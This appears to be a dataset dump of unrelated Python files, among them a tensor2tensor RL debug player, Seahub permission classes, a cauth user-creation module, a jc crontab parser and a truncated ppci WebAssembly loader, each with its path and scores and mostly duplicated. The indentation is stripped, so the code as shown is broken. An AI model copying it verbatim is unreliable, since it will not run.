fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=None,
gaps_margin=gaps_margin
)
@should_raise(MissingDataException)
def test_fl_mda_valid_time_manager_get_fl_mda_valid_times_failed_due_to_lack_of_timestamps(self):
gaps_margin = 0.0001
sampling_rate = 1.0
mock_nwb = MagicMock(spec=NWBFile)
mock_nwb.acquisition['e-series'].timestamps = None
mock_metadata = {'times_period_multiplier': 1.5}
fl_mda_valid_time_manager = FlMdaValidTimeManager(sampling_rate, mock_metadata)
fl_mda_valid_time_manager.get_fl_mda_valid_times(
nwb_content=mock_nwb,
gaps_margin=gaps_margin
)
| 0.7237 | 0.496704 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import os
from gym.core import Env
from gym.spaces import Box
from gym.spaces import Discrete
from gym.utils import play
import numpy as np
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from tensor2tensor.data_generators import gym_env
from tensor2tensor.models.research.rl import get_policy
from tensor2tensor.rl.envs.simulated_batch_env import SimulatedBatchEnv
from tensor2tensor.rl.trainer_model_based import FLAGS
from tensor2tensor.rl.trainer_model_based import setup_directories
from tensor2tensor.rl.trainer_model_based import temporary_flags
from tensor2tensor.utils import registry
from tensor2tensor.utils import trainer_lib
import tensorflow as tf
_font = None
FONT_SIZE = 20
def _get_font():
global _font
if _font is None:
font_paths = []
for path in font_paths:
try:
_font = ImageFont.truetype(path, FONT_SIZE)
return _font
except: # pylint: disable=bare-except
pass
def _assert_image(img):
if isinstance(img, np.ndarray):
img = Image.fromarray(np.ndarray.astype(img, np.uint8))
return img
def write_on_image(img, text="", position=(0, 0), color=(255, 255, 255)):
img = _assert_image(img)
if not text:
return img
draw = ImageDraw.Draw(img)
font = _get_font()
draw.text(position, text, color, font=font)
return img
def concatenate_images(imgs, axis=1):
imgs = [_assert_image(img) for img in imgs]
imgs_np = [np.array(img) for img in imgs]
concatenated_im_np = np.concatenate(imgs_np, axis=axis)
return _assert_image(concatenated_im_np)
class DebugBatchEnv(Env):
"""Debugging Environment."""
INFO_PANE_WIDTH = 250
def __init__(self, hparams, sess=None):
self.action_space = Discrete(6)
self.observation_space = Box(
low=0, high=255, shape=(210, 160+DebugBatchEnv.INFO_PANE_WIDTH, 3),
dtype=np.uint8)
self._tmp = 1
self.res = None
self.sess = sess if sess is not None else tf.Session()
self._prepare_networks(hparams, self.sess)
def _prepare_networks(self, hparams, sess):
self.action = tf.placeholder(shape=(1,), dtype=tf.int32)
batch_env = SimulatedBatchEnv(hparams.environment_spec, hparams.num_agents)
self.reward, self.done = batch_env.simulate(self.action)
self.observation = batch_env.observ
self.reset_op = batch_env.reset(tf.constant([0], dtype=tf.int32))
environment_wrappers = hparams.environment_spec.wrappers
wrappers = copy.copy(environment_wrappers) if environment_wrappers else []
to_initialize = [batch_env]
for w in wrappers:
batch_env = w[0](batch_env, **w[1])
to_initialize.append(batch_env)
def initialization_lambda():
for batch_env in to_initialize:
batch_env.initialize(sess)
self.initialize = initialization_lambda
obs_copy = batch_env.observ + 0
actor_critic = get_policy(tf.expand_dims(obs_copy, 0), hparams)
self.policy_probs = actor_critic.policy.probs[0, 0, :]
self.value = actor_critic.value[0, :]
def render(self, mode="human"):
raise NotImplementedError()
def _fake_reset(self):
self._tmp = 0
observ = np.ones(shape=(210, 160, 3), dtype=np.uint8) * 10 * self._tmp
observ[0, 0, 0] = 0
observ[0, 0, 1] = 255
self.res = (observ, 0, False, [0.1, 0.5, 0.5], 1.1)
def _reset_env(self):
observ = self.sess.run(self.reset_op)[0, ...]
observ[0, 0, 0] = 0
observ[0, 0, 1] = 255
# TODO(pmilos): put correct numbers
self.res = (observ, 0, False, [0.1, 0.5, 0.5], 1.1)
def reset(self):
self._reset_env()
observ = self._augment_observation()
return observ
def _step_fake(self, action):
observ = np.ones(shape=(210, 160, 3), dtype=np.uint8)*10*self._tmp
observ[0, 0, 0] = 0
observ[0, 0, 1] = 255
self._tmp += 1
if self._tmp > 20:
self._tmp = 0
rew = 1
done = False
probs = np.ones(shape=(6,), dtype=np.float32)/6
vf = 0.0
return observ, rew, done, probs, vf
def _step_env(self, action):
observ, rew, done, probs, vf = self.sess.\
run([self.observation, self.reward, self.done, self.policy_probs,
self.value],
feed_dict={self.action: [action]})
return observ[0, ...], rew[0, ...], done[0, ...], probs, vf
def _augment_observation(self):
observ, rew, _, probs, vf = self.res
info_pane = np.zeros(shape=(210, DebugBatchEnv.INFO_PANE_WIDTH, 3),
dtype=np.uint8)
probs_str = ""
for p in probs:
probs_str += "%.2f" % p + ", "
probs_str = probs_str[:-2]
action = np.argmax(probs)
info_str = " Policy:{}\n Action:{}\n Value function:{}\n Reward:{}".format(
probs_str, action, vf, rew)
print("Info str:{}".format(info_str))
# info_pane = write_on_image(info_pane, info_str)
augmented_observ = concatenate_images([observ, info_pane])
augmented_observ = np.array(augmented_observ)
return augmented_observ
def step(self, action):
# Special codes
if action == 100:
# skip action
_, rew, done, _, _ = self.res
observ = self._augment_observation()
return observ, rew, done, {}
if action == 101:
# reset
self.reset()
_, rew, done, _, _ = self.res
observ = self._augment_observation()
return observ, rew, done, {}
if action == 102:
# play
raise NotImplementedError()
# standard codes
observ, rew, done, probs, vf = self._step_env(action)
self.res = (observ, rew, done, probs, vf)
observ = self._augment_observation()
return observ, rew, done, {"probs": probs, "vf": vf}
def main(_):
hparams = registry.hparams(FLAGS.loop_hparams_set)
hparams.parse(FLAGS.loop_hparams)
output_dir = FLAGS.output_dir
subdirectories = ["data", "tmp", "world_model", "ppo"]
using_autoencoder = hparams.autoencoder_train_steps > 0
if using_autoencoder:
subdirectories.append("autoencoder")
directories = setup_directories(output_dir, subdirectories)
if hparams.game in gym_env.ATARI_GAMES:
game_with_mode = hparams.game + "_deterministic-v4"
else:
game_with_mode = hparams.game
if using_autoencoder:
simulated_problem_name = (
"gym_simulated_discrete_problem_with_agent_on_%s_autoencoded"
% game_with_mode)
else:
simulated_problem_name = ("gym_simulated_discrete_problem_with_agent_on_%s"
% game_with_mode)
if simulated_problem_name not in registry.list_problems():
tf.logging.info("Game Problem %s not found; dynamically registering",
simulated_problem_name)
gym_env.register_game(hparams.game, game_mode="Deterministic-v4")
epoch = hparams.epochs-1
epoch_data_dir = os.path.join(directories["data"], str(epoch))
ppo_model_dir = directories["ppo"]
world_model_dir = directories["world_model"]
gym_problem = registry.problem(simulated_problem_name)
model_hparams = trainer_lib.create_hparams(hparams.generative_model_params)
environment_spec = copy.copy(gym_problem.environment_spec)
environment_spec.simulation_random_starts = hparams.simulation_random_starts
batch_env_hparams = trainer_lib.create_hparams(hparams.ppo_params)
batch_env_hparams.add_hparam("model_hparams", model_hparams)
batch_env_hparams.add_hparam("environment_spec", environment_spec)
batch_env_hparams.num_agents = 1
with temporary_flags({
"problem": simulated_problem_name,
"model": hparams.generative_model,
"hparams_set": hparams.generative_model_params,
"output_dir": world_model_dir,
"data_dir": epoch_data_dir,
}):
sess = tf.Session()
env = DebugBatchEnv(batch_env_hparams, sess)
sess.run(tf.global_variables_initializer())
env.initialize()
env_model_loader = tf.train.Saver(
tf.global_variables("next_frame*"))
trainer_lib.restore_checkpoint(world_model_dir, env_model_loader, sess,
must_restore=True)
model_saver = tf.train.Saver(
tf.global_variables(".*network_parameters.*"))
trainer_lib.restore_checkpoint(ppo_model_dir, model_saver, sess)
key_mapping = gym_problem.env.env.get_keys_to_action()
# map special codes
key_mapping[()] = 100
key_mapping[(ord("r"),)] = 101
key_mapping[(ord("p"),)] = 102
play.play(env, zoom=2, fps=10, keys_to_action=key_mapping)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
|
v0.5.0/google/research_v3.32/gnmt-tpuv3-32/code/gnmt/model/t2t/tensor2tensor/rl/model_rl_experiment_player.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import os
from gym.core import Env
from gym.spaces import Box
from gym.spaces import Discrete
from gym.utils import play
import numpy as np
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from tensor2tensor.data_generators import gym_env
from tensor2tensor.models.research.rl import get_policy
from tensor2tensor.rl.envs.simulated_batch_env import SimulatedBatchEnv
from tensor2tensor.rl.trainer_model_based import FLAGS
from tensor2tensor.rl.trainer_model_based import setup_directories
from tensor2tensor.rl.trainer_model_based import temporary_flags
from tensor2tensor.utils import registry
from tensor2tensor.utils import trainer_lib
import tensorflow as tf
_font = None
FONT_SIZE = 20
def _get_font():
global _font
if _font is None:
font_paths = []
for path in font_paths:
try:
_font = ImageFont.truetype(path, FONT_SIZE)
return _font
except: # pylint: disable=bare-except
pass
def _assert_image(img):
if isinstance(img, np.ndarray):
img = Image.fromarray(np.ndarray.astype(img, np.uint8))
return img
def write_on_image(img, text="", position=(0, 0), color=(255, 255, 255)):
img = _assert_image(img)
if not text:
return img
draw = ImageDraw.Draw(img)
font = _get_font()
draw.text(position, text, color, font=font)
return img
def concatenate_images(imgs, axis=1):
imgs = [_assert_image(img) for img in imgs]
imgs_np = [np.array(img) for img in imgs]
concatenated_im_np = np.concatenate(imgs_np, axis=axis)
return _assert_image(concatenated_im_np)
class DebugBatchEnv(Env):
"""Debugging Environment."""
INFO_PANE_WIDTH = 250
def __init__(self, hparams, sess=None):
self.action_space = Discrete(6)
self.observation_space = Box(
low=0, high=255, shape=(210, 160+DebugBatchEnv.INFO_PANE_WIDTH, 3),
dtype=np.uint8)
self._tmp = 1
self.res = None
self.sess = sess if sess is not None else tf.Session()
self._prepare_networks(hparams, self.sess)
def _prepare_networks(self, hparams, sess):
self.action = tf.placeholder(shape=(1,), dtype=tf.int32)
batch_env = SimulatedBatchEnv(hparams.environment_spec, hparams.num_agents)
self.reward, self.done = batch_env.simulate(self.action)
self.observation = batch_env.observ
self.reset_op = batch_env.reset(tf.constant([0], dtype=tf.int32))
environment_wrappers = hparams.environment_spec.wrappers
wrappers = copy.copy(environment_wrappers) if environment_wrappers else []
to_initialize = [batch_env]
for w in wrappers:
batch_env = w[0](batch_env, **w[1])
to_initialize.append(batch_env)
def initialization_lambda():
for batch_env in to_initialize:
batch_env.initialize(sess)
self.initialize = initialization_lambda
obs_copy = batch_env.observ + 0
actor_critic = get_policy(tf.expand_dims(obs_copy, 0), hparams)
self.policy_probs = actor_critic.policy.probs[0, 0, :]
self.value = actor_critic.value[0, :]
def render(self, mode="human"):
raise NotImplementedError()
def _fake_reset(self):
self._tmp = 0
observ = np.ones(shape=(210, 160, 3), dtype=np.uint8) * 10 * self._tmp
observ[0, 0, 0] = 0
observ[0, 0, 1] = 255
self.res = (observ, 0, False, [0.1, 0.5, 0.5], 1.1)
def _reset_env(self):
observ = self.sess.run(self.reset_op)[0, ...]
observ[0, 0, 0] = 0
observ[0, 0, 1] = 255
# TODO(pmilos): put correct numbers
self.res = (observ, 0, False, [0.1, 0.5, 0.5], 1.1)
def reset(self):
self._reset_env()
observ = self._augment_observation()
return observ
def _step_fake(self, action):
observ = np.ones(shape=(210, 160, 3), dtype=np.uint8)*10*self._tmp
observ[0, 0, 0] = 0
observ[0, 0, 1] = 255
self._tmp += 1
if self._tmp > 20:
self._tmp = 0
rew = 1
done = False
probs = np.ones(shape=(6,), dtype=np.float32)/6
vf = 0.0
return observ, rew, done, probs, vf
def _step_env(self, action):
observ, rew, done, probs, vf = self.sess.\
run([self.observation, self.reward, self.done, self.policy_probs,
self.value],
feed_dict={self.action: [action]})
return observ[0, ...], rew[0, ...], done[0, ...], probs, vf
def _augment_observation(self):
observ, rew, _, probs, vf = self.res
info_pane = np.zeros(shape=(210, DebugBatchEnv.INFO_PANE_WIDTH, 3),
dtype=np.uint8)
probs_str = ""
for p in probs:
probs_str += "%.2f" % p + ", "
probs_str = probs_str[:-2]
action = np.argmax(probs)
info_str = " Policy:{}\n Action:{}\n Value function:{}\n Reward:{}".format(
probs_str, action, vf, rew)
print("Info str:{}".format(info_str))
# info_pane = write_on_image(info_pane, info_str)
augmented_observ = concatenate_images([observ, info_pane])
augmented_observ = np.array(augmented_observ)
return augmented_observ
def step(self, action):
# Special codes
if action == 100:
# skip action
_, rew, done, _, _ = self.res
observ = self._augment_observation()
return observ, rew, done, {}
if action == 101:
# reset
self.reset()
_, rew, done, _, _ = self.res
observ = self._augment_observation()
return observ, rew, done, {}
if action == 102:
# play
raise NotImplementedError()
# standard codes
observ, rew, done, probs, vf = self._step_env(action)
self.res = (observ, rew, done, probs, vf)
observ = self._augment_observation()
return observ, rew, done, {"probs": probs, "vf": vf}
def main(_):
hparams = registry.hparams(FLAGS.loop_hparams_set)
hparams.parse(FLAGS.loop_hparams)
output_dir = FLAGS.output_dir
subdirectories = ["data", "tmp", "world_model", "ppo"]
using_autoencoder = hparams.autoencoder_train_steps > 0
if using_autoencoder:
subdirectories.append("autoencoder")
directories = setup_directories(output_dir, subdirectories)
if hparams.game in gym_env.ATARI_GAMES:
game_with_mode = hparams.game + "_deterministic-v4"
else:
game_with_mode = hparams.game
if using_autoencoder:
simulated_problem_name = (
"gym_simulated_discrete_problem_with_agent_on_%s_autoencoded"
% game_with_mode)
else:
simulated_problem_name = ("gym_simulated_discrete_problem_with_agent_on_%s"
% game_with_mode)
if simulated_problem_name not in registry.list_problems():
tf.logging.info("Game Problem %s not found; dynamically registering",
simulated_problem_name)
gym_env.register_game(hparams.game, game_mode="Deterministic-v4")
epoch = hparams.epochs-1
epoch_data_dir = os.path.join(directories["data"], str(epoch))
ppo_model_dir = directories["ppo"]
world_model_dir = directories["world_model"]
gym_problem = registry.problem(simulated_problem_name)
model_hparams = trainer_lib.create_hparams(hparams.generative_model_params)
environment_spec = copy.copy(gym_problem.environment_spec)
environment_spec.simulation_random_starts = hparams.simulation_random_starts
batch_env_hparams = trainer_lib.create_hparams(hparams.ppo_params)
batch_env_hparams.add_hparam("model_hparams", model_hparams)
batch_env_hparams.add_hparam("environment_spec", environment_spec)
batch_env_hparams.num_agents = 1
with temporary_flags({
"problem": simulated_problem_name,
"model": hparams.generative_model,
"hparams_set": hparams.generative_model_params,
"output_dir": world_model_dir,
"data_dir": epoch_data_dir,
}):
sess = tf.Session()
env = DebugBatchEnv(batch_env_hparams, sess)
sess.run(tf.global_variables_initializer())
env.initialize()
env_model_loader = tf.train.Saver(
tf.global_variables("next_frame*"))
trainer_lib.restore_checkpoint(world_model_dir, env_model_loader, sess,
must_restore=True)
model_saver = tf.train.Saver(
tf.global_variables(".*network_parameters.*"))
trainer_lib.restore_checkpoint(ppo_model_dir, model_saver, sess)
key_mapping = gym_problem.env.env.get_keys_to_action()
# map special codes
key_mapping[()] = 100
key_mapping[(ord("r"),)] = 101
key_mapping[(ord("p"),)] = 102
play.play(env, zoom=2, fps=10, keys_to_action=key_mapping)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
| 0.617513 | 0.248386 |
from rest_framework.permissions import BasePermission
from django.conf import settings
from seaserv import check_permission, is_repo_owner, ccnet_api
from seahub.utils import is_pro_version
SAFE_METHODS = ['GET', 'HEAD', 'OPTIONS']
class IsRepoWritable(BasePermission):
"""
Allows access only for user who has write permission to the repo.
"""
def has_permission(self, request, view, obj=None):
if request.method in SAFE_METHODS:
return True
repo_id = view.kwargs.get('repo_id', '')
user = request.user.username if request.user else ''
if user and check_permission(repo_id, user) == 'rw':
return True
return False
class IsRepoAccessible(BasePermission):
"""
Check whether user has Read or Write permission to a repo.
"""
def has_permission(self, request, view, obj=None):
repo_id = view.kwargs.get('repo_id', '')
user = request.user.username if request.user else ''
return True if check_permission(repo_id, user) else False
class IsRepoOwner(BasePermission):
"""
Check whether user is the owner of a repo.
"""
def has_permission(self, request, view, obj=None):
repo_id = view.kwargs.get('repo_id', '')
user = request.user.username if request.user else ''
return True if is_repo_owner(user, repo_id) else False
class IsGroupMember(BasePermission):
"""
Check whether user is in a group.
"""
def has_permission(self, request, view, obj=None):
group_id = int(view.kwargs.get('group_id', ''))
username = request.user.username if request.user else ''
return True if ccnet_api.is_group_user(group_id, username) else False
class CanInviteGuest(BasePermission):
"""Check user has permission to invite a guest.
"""
def has_permission(self, request, *args, **kwargs):
return settings.ENABLE_GUEST_INVITATION and \
request.user.permissions.can_invite_guest()
class CanGenerateShareLink(BasePermission):
"""Check user has permission to generate share link.
"""
def has_permission(self, request, *args, **kwargs):
return request.user.permissions.can_generate_share_link()
class CanGenerateUploadLink(BasePermission):
"""Check user has permission to generate upload link.
"""
def has_permission(self, request, *args, **kwargs):
return request.user.permissions.can_generate_upload_link()
class CanSendShareLinkMail(BasePermission):
"""Check user has permission to generate upload link.
"""
def has_permission(self, request, *args, **kwargs):
return request.user.permissions.can_send_share_link_mail()
class IsProVersion(BasePermission):
"""
Check whether Seafile is pro version
"""
def has_permission(self, request, *args, **kwargs):
return is_pro_version()
|
seahub/api2/permissions.py
|
from rest_framework.permissions import BasePermission
from django.conf import settings
from seaserv import check_permission, is_repo_owner, ccnet_api
from seahub.utils import is_pro_version
SAFE_METHODS = ['GET', 'HEAD', 'OPTIONS']
class IsRepoWritable(BasePermission):
"""
Allows access only for user who has write permission to the repo.
"""
def has_permission(self, request, view, obj=None):
if request.method in SAFE_METHODS:
return True
repo_id = view.kwargs.get('repo_id', '')
user = request.user.username if request.user else ''
if user and check_permission(repo_id, user) == 'rw':
return True
return False
class IsRepoAccessible(BasePermission):
"""
Check whether user has Read or Write permission to a repo.
"""
def has_permission(self, request, view, obj=None):
repo_id = view.kwargs.get('repo_id', '')
user = request.user.username if request.user else ''
return True if check_permission(repo_id, user) else False
class IsRepoOwner(BasePermission):
"""
Check whether user is the owner of a repo.
"""
def has_permission(self, request, view, obj=None):
repo_id = view.kwargs.get('repo_id', '')
user = request.user.username if request.user else ''
return True if is_repo_owner(user, repo_id) else False
class IsGroupMember(BasePermission):
"""
Check whether user is in a group.
"""
def has_permission(self, request, view, obj=None):
group_id = int(view.kwargs.get('group_id', ''))
username = request.user.username if request.user else ''
return True if ccnet_api.is_group_user(group_id, username) else False
class CanInviteGuest(BasePermission):
"""Check user has permission to invite a guest.
"""
def has_permission(self, request, *args, **kwargs):
return settings.ENABLE_GUEST_INVITATION and \
request.user.permissions.can_invite_guest()
class CanGenerateShareLink(BasePermission):
"""Check user has permission to generate share link.
"""
def has_permission(self, request, *args, **kwargs):
return request.user.permissions.can_generate_share_link()
class CanGenerateUploadLink(BasePermission):
"""Check user has permission to generate upload link.
"""
def has_permission(self, request, *args, **kwargs):
return request.user.permissions.can_generate_upload_link()
class CanSendShareLinkMail(BasePermission):
"""Check user has permission to generate upload link.
"""
def has_permission(self, request, *args, **kwargs):
return request.user.permissions.can_send_share_link_mail()
class IsProVersion(BasePermission):
"""
Check whether Seafile is pro version
"""
def has_permission(self, request, *args, **kwargs):
return is_pro_version()
| 0.462959 | 0.072308 |
import hashlib
import logging
from stevedore import driver
from pecan import conf
from cauth.service import base
from cauth.model import db as auth_map
from cauth.utils import transaction
from cauth.utils import exceptions
def differentiate(login, domain, uid):
suffix = hashlib.sha1((domain + '/' + str(uid)).encode()).hexdigest()
return login + '_' + suffix[:6]
class UserDetailsCreator(transaction.TransactionLogger):
log = logging.getLogger("cauth.UserDetailsCreator")
def __init__(self, conf):
self.services = []
for service in conf.services:
try:
plugin = driver.DriverManager(
namespace='cauth.service',
name=service,
invoke_on_load=True,
invoke_args=(conf,)).driver
self.services.append(plugin)
except base.ServiceConfigurationError as e:
self.logger.error(str(e))
def create_user(self, user):
external_info = user.get('external_auth', {})
transactionID = user.get('transactionID', '')
c_id = -1
# skip if authenticating with an API key
if external_info:
if external_info.get('domain') == 'CAUTH_API_KEY':
c_id = external_info['external_id']
else:
external_info['username'] = user['login']
try:
c_id = auth_map.get_or_create_authenticated_user(
**external_info)
except exceptions.UsernameConflictException as e:
strategy = conf.auth.get('login_collision_strategy')
if strategy == 'DIFFERENTIATE':
old_login = user['login']
user['login'] = differentiate(
user['login'],
external_info.get('domain', ''),
external_info['external_id'])
external_info['username'] = user['login']
self.tinfo(
"Login \"%s\" already registered for domain "
"%s, uid %s, differentiating login as %s",
transactionID, old_login,
e.external_auth_details['domain'],
e.external_auth_details['external_id'],
user['login'])
c_id = auth_map.get_or_create_authenticated_user(
**external_info)
elif strategy == 'FORBID':
raise
else:
self.terror("Incorrect login collision strategy "
"\"%s\", defaulting to \"FORBID\"",
transactionID, strategy)
raise
del user['external_auth']
user['external_id'] = c_id
for service in self.services:
try:
service.register_new_user(user)
except base.UserRegistrationError:
self.texception('Error when adding user %s (ID %s)',
transactionID, user['login'], c_id)
return c_id
|
cauth/utils/userdetails.py
|
import hashlib
import logging
from stevedore import driver
from pecan import conf
from cauth.service import base
from cauth.model import db as auth_map
from cauth.utils import transaction
from cauth.utils import exceptions
def differentiate(login, domain, uid):
suffix = hashlib.sha1((domain + '/' + str(uid)).encode()).hexdigest()
return login + '_' + suffix[:6]
class UserDetailsCreator(transaction.TransactionLogger):
log = logging.getLogger("cauth.UserDetailsCreator")
def __init__(self, conf):
self.services = []
for service in conf.services:
try:
plugin = driver.DriverManager(
namespace='cauth.service',
name=service,
invoke_on_load=True,
invoke_args=(conf,)).driver
self.services.append(plugin)
except base.ServiceConfigurationError as e:
self.logger.error(str(e))
def create_user(self, user):
external_info = user.get('external_auth', {})
transactionID = user.get('transactionID', '')
c_id = -1
# skip if authenticating with an API key
if external_info:
if external_info.get('domain') == 'CAUTH_API_KEY':
c_id = external_info['external_id']
else:
external_info['username'] = user['login']
try:
c_id = auth_map.get_or_create_authenticated_user(
**external_info)
except exceptions.UsernameConflictException as e:
strategy = conf.auth.get('login_collision_strategy')
if strategy == 'DIFFERENTIATE':
old_login = user['login']
user['login'] = differentiate(
user['login'],
external_info.get('domain', ''),
external_info['external_id'])
external_info['username'] = user['login']
self.tinfo(
"Login \"%s\" already registered for domain "
"%s, uid %s, differentiating login as %s",
transactionID, old_login,
e.external_auth_details['domain'],
e.external_auth_details['external_id'],
user['login'])
c_id = auth_map.get_or_create_authenticated_user(
**external_info)
elif strategy == 'FORBID':
raise
else:
self.terror("Incorrect login collision strategy "
"\"%s\", defaulting to \"FORBID\"",
transactionID, strategy)
raise
del user['external_auth']
user['external_id'] = c_id
for service in self.services:
try:
service.register_new_user(user)
except base.UserRegistrationError:
self.texception('Error when adding user %s (ID %s)',
transactionID, user['login'], c_id)
return c_id
| 0.298798 | 0.049451 |
import jc.utils
import jc.parsers.universal
class info():
version = '1.0'
description = 'crontab file parser with user support'
author = '<NAME>'
author_email = '<EMAIL>'
# details = 'enter any other details here'
# compatible options: linux, darwin, cygwin, win32, aix, freebsd
compatible = ['linux', 'darwin', 'aix', 'freebsd']
__version__ = info.version
def process(proc_data):
"""
Final processing to conform to the schema.
Parameters:
proc_data: (dictionary) raw structured data to process
Returns:
Dictionary. Structured data with the following schema:
{
"variables": [
"name": string,
"value": string
],
"schedule": [
{
"occurrence" string,
"minute": [
string
],
"hour": [
string
],
"day_of_month": [
string
],
"month": [
string
],
"day_of_week": [
string
],
"occurrence": string,
"user": string,
"command": string
}
]
}
"""
# put itmes in lists
try:
for entry in proc_data['schedule']:
entry['minute'] = entry['minute'].split(',')
entry['hour'] = entry['hour'].split(',')
entry['day_of_month'] = entry['day_of_month'].split(',')
entry['month'] = entry['month'].split(',')
entry['day_of_week'] = entry['day_of_week'].split(',')
except (KeyError):
pass
return proc_data
def parse(data, raw=False, quiet=False):
"""
Main text parsing function
Parameters:
data: (string) text data to parse
raw: (boolean) output preprocessed JSON if True
quiet: (boolean) suppress warning messages if True
Returns:
Dictionary. Raw or processed structured data.
"""
if not quiet:
jc.utils.compatibility(__name__, info.compatible)
raw_output = {}
cleandata = data.splitlines()
# Clear any blank lines
cleandata = list(filter(None, cleandata))
# Clear any commented lines
for i, line in reversed(list(enumerate(cleandata))):
if line.strip().find('#') == 0:
cleandata.pop(i)
# Pop any variable assignment lines
cron_var = []
for i, line in reversed(list(enumerate(cleandata))):
if line.find('=') != -1:
var_line = cleandata.pop(i)
var_name = var_line.split('=', maxsplit=1)[0].strip()
var_value = var_line.split('=', maxsplit=1)[1].strip()
cron_var.append({'name': var_name,
'value': var_value})
raw_output['variables'] = cron_var
# Pop any shortcut lines
shortcut_list = []
for i, line in reversed(list(enumerate(cleandata))):
if line.strip().startswith('@'):
shortcut_line = cleandata.pop(i)
occurrence = shortcut_line.split(maxsplit=1)[0].strip().lstrip('@')
usr = shortcut_line.split(maxsplit=2)[1].strip()
cmd = shortcut_line.split(maxsplit=2)[2].strip()
shortcut_list.append({'occurrence': occurrence,
'user': usr,
'command': cmd})
# Add header row for parsing
cleandata[:0] = ['minute hour day_of_month month day_of_week user command']
if len(cleandata) > 1:
cron_list = jc.parsers.universal.simple_table_parse(cleandata)
raw_output['schedule'] = cron_list
# Add shortcut entries back in
for item in shortcut_list:
raw_output['schedule'].append(item)
if raw:
return raw_output
else:
return process(raw_output)
|
jc/parsers/crontab_u.py
|
import jc.utils
import jc.parsers.universal
class info():
version = '1.0'
description = 'crontab file parser with user support'
author = '<NAME>'
author_email = '<EMAIL>'
# details = 'enter any other details here'
# compatible options: linux, darwin, cygwin, win32, aix, freebsd
compatible = ['linux', 'darwin', 'aix', 'freebsd']
__version__ = info.version
def process(proc_data):
"""
Final processing to conform to the schema.
Parameters:
proc_data: (dictionary) raw structured data to process
Returns:
Dictionary. Structured data with the following schema:
{
"variables": [
"name": string,
"value": string
],
"schedule": [
{
"occurrence" string,
"minute": [
string
],
"hour": [
string
],
"day_of_month": [
string
],
"month": [
string
],
"day_of_week": [
string
],
"occurrence": string,
"user": string,
"command": string
}
]
}
"""
# put itmes in lists
try:
for entry in proc_data['schedule']:
entry['minute'] = entry['minute'].split(',')
entry['hour'] = entry['hour'].split(',')
entry['day_of_month'] = entry['day_of_month'].split(',')
entry['month'] = entry['month'].split(',')
entry['day_of_week'] = entry['day_of_week'].split(',')
except (KeyError):
pass
return proc_data
def parse(data, raw=False, quiet=False):
"""
Main text parsing function
Parameters:
data: (string) text data to parse
raw: (boolean) output preprocessed JSON if True
quiet: (boolean) suppress warning messages if True
Returns:
Dictionary. Raw or processed structured data.
"""
if not quiet:
jc.utils.compatibility(__name__, info.compatible)
raw_output = {}
cleandata = data.splitlines()
# Clear any blank lines
cleandata = list(filter(None, cleandata))
# Clear any commented lines
for i, line in reversed(list(enumerate(cleandata))):
if line.strip().find('#') == 0:
cleandata.pop(i)
# Pop any variable assignment lines
cron_var = []
for i, line in reversed(list(enumerate(cleandata))):
if line.find('=') != -1:
var_line = cleandata.pop(i)
var_name = var_line.split('=', maxsplit=1)[0].strip()
var_value = var_line.split('=', maxsplit=1)[1].strip()
cron_var.append({'name': var_name,
'value': var_value})
raw_output['variables'] = cron_var
# Pop any shortcut lines
shortcut_list = []
for i, line in reversed(list(enumerate(cleandata))):
if line.strip().startswith('@'):
shortcut_line = cleandata.pop(i)
occurrence = shortcut_line.split(maxsplit=1)[0].strip().lstrip('@')
usr = shortcut_line.split(maxsplit=2)[1].strip()
cmd = shortcut_line.split(maxsplit=2)[2].strip()
shortcut_list.append({'occurrence': occurrence,
'user': usr,
'command': cmd})
# Add header row for parsing
cleandata[:0] = ['minute hour day_of_month month day_of_week user command']
if len(cleandata) > 1:
cron_list = jc.parsers.universal.simple_table_parse(cleandata)
raw_output['schedule'] = cron_list
# Add shortcut entries back in
for item in shortcut_list:
raw_output['schedule'].append(item)
if raw:
return raw_output
else:
return process(raw_output)
| 0.49585 | 0.304145 |
import logging
import os
import shelve
import struct
from ...utils.codepage import load_obj, MemoryPage
from ...irutils import verify_module
from .. import wasm_to_ir
from ..components import Table
from ..util import PAGE_SIZE
from ._base_instance import ModuleInstance, WasmMemory, WasmGlobal
logger = logging.getLogger("instantiate")
def native_instantiate(module, imports, reporter, cache_file):
""" Load wasm module native """
from ...api import ir_to_object, get_current_arch
logger.info("Instantiating wasm module as native code")
arch = get_current_arch()
# key = (arch, module)
# TODO: think of clever caching trickery:
cache_file = None
if cache_file and os.path.exists(cache_file):
logger.info("Using cached object from %s", cache_file)
with shelve.open(cache_file) as s:
obj = s["obj"]
ppci_module = s["ppci_module"]
else:
# TODO: use cache here to short circuit re-compilation
# hash(key)
# print(hash(key))
# hgkfdg
ppci_module = wasm_to_ir(
module, arch.info.get_type_info("ptr"), reporter=reporter
)
verify_module(ppci_module)
obj = ir_to_object([ppci_module], arch, debug=True, reporter=reporter)
if cache_file:
logger.info("Saving object to %s for later use", cache_file)
with shelve.open(cache_file) as s:
s["obj"] = obj
s["ppci_module"] = ppci_module
instance = NativeModuleInstance(obj, imports)
instance._wasm_function_names = ppci_module._wasm_function_names
instance._wasm_global_names = ppci_module._wasm_global_names
return instance
class NativeModuleInstance(ModuleInstance):
""" Wasm module loaded as natively compiled code """
def __init__(self, obj, imports2):
super().__init__()
imports = {}
imports["wasm_rt_memory_grow"] = self.memory_grow
imports["wasm_rt_memory_size"] = self.memory_size
for name, imp_obj in imports2.items():
assert name not in imports
if isinstance(imp_obj, Table):
# print(name, obj)
ptr_size = 8 # TODO: determine this?
table_byte_size = imp_obj.max * ptr_size
# Allocate native memory page for table.
self._table_obj = MemoryPage(table_byte_size)
# Enter table memory page in extra symbols:
magic_key = "func_table"
assert magic_key not in imports
imports[magic_key] = self._table_obj
imports[name] = self._table_obj
else:
imports[name] = imp_obj
self._code_module = load_obj(obj, imports=imports)
def _run_init(self):
self._code_module._run_init()
def memory_size(self) -> int:
""" return memory size in pages """
return self._memory_data_page.size // PAGE_SIZE
def memory_grow(self, amount: int) -> int:
""" Grow memory and return the old size.
Current strategy:
- claim new memory
- copy all data
- free old memory
- update wasm memory base pointer
"""
max_size = self._memories[0].max_size
old_size = self.memory_size()
new_size = old_size + amount
# Keep memory within sensible bounds:
